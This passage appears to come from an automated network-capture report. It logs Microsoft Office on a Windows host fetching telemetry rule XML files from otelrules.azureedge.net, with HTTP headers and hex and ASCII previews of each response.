                                                  2024-10-13 17:34:34 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  137192.168.2.44990313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:34 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:34 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1364
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB6AD293"
                                                  x-ms-request-id: aa10c15c-401e-0067-377e-1b09c2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173434Z-17db6f7c8cfq2j6f03aq9y8dns00000004c000000000ay08
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:34 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  138192.168.2.44990413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:34 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:35 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1391
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF58DC7E"
                                                  x-ms-request-id: 05046913-601e-000d-6fd8-1a2618000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173434Z-17db6f7c8cfqkqk8bn4ck6f72000000004x000000000d9t8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:35 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  139192.168.2.44990513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:35 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:35 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1354
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                  ETag: "0x8DC582BE0662D7C"
                                                  x-ms-request-id: 7536bc90-101e-005a-6b87-1c882b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173435Z-17db6f7c8cfvzwz27u5rnq9kpc00000005h0000000007gyx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:35 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  140192.168.2.44990613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:35 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:35 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                  ETag: "0x8DC582BDCDD6400"
                                                  x-ms-request-id: 03f8bcf3-701e-0098-27e6-1a395f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173435Z-17db6f7c8cfqkqk8bn4ck6f7200000000510000000004r9n
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:35 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  141192.168.2.44990713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:35 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:35 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                  ETag: "0x8DC582BDF1E2608"
                                                  x-ms-request-id: 47bad248-d01e-0014-2e9c-1bed58000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173435Z-17db6f7c8cfhrxld7punfw920n0000000410000000003uz1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:35 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  142192.168.2.44990913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:35 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:35 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1362
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF497570"
                                                  x-ms-request-id: 1c06004d-d01e-005a-0ee5-1a7fd9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173435Z-17db6f7c8cfbd7pgux3k6qfa600000000460000000002h2w
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:35 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  143192.168.2.44990813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:35 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:35 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1399
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                  ETag: "0x8DC582BE8C605FF"
                                                  x-ms-request-id: 083451f6-401e-0035-25c0-1a82d8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173435Z-17db6f7c8cfvzwz27u5rnq9kpc00000005h0000000007gz2
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:35 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  144192.168.2.44991013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:36 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:36 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDC2EEE03"
                                                  x-ms-request-id: 6411c5a0-901e-0083-0ae3-1abb55000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173436Z-17db6f7c8cf5mtxmr1c51513n000000005c000000000bq2h
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:36 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  145192.168.2.44991113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:36 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:36 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                  ETag: "0x8DC582BEA414B16"
                                                  x-ms-request-id: df344972-701e-001e-12cd-1af5e6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173436Z-17db6f7c8cfqxt4wrzg7st2fm800000005d0000000002nwp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:36 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  146192.168.2.44991213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:36 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:36 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1399
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                  ETag: "0x8DC582BE1CC18CD"
                                                  x-ms-request-id: 842b74fa-501e-008c-2f04-1acd39000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173436Z-17db6f7c8cfhzb2znbk0zyvf6n00000004v000000000deyy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:36 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  147192.168.2.44991413.107.246.45443
                                                  TimestampBytes transferredDirectionData
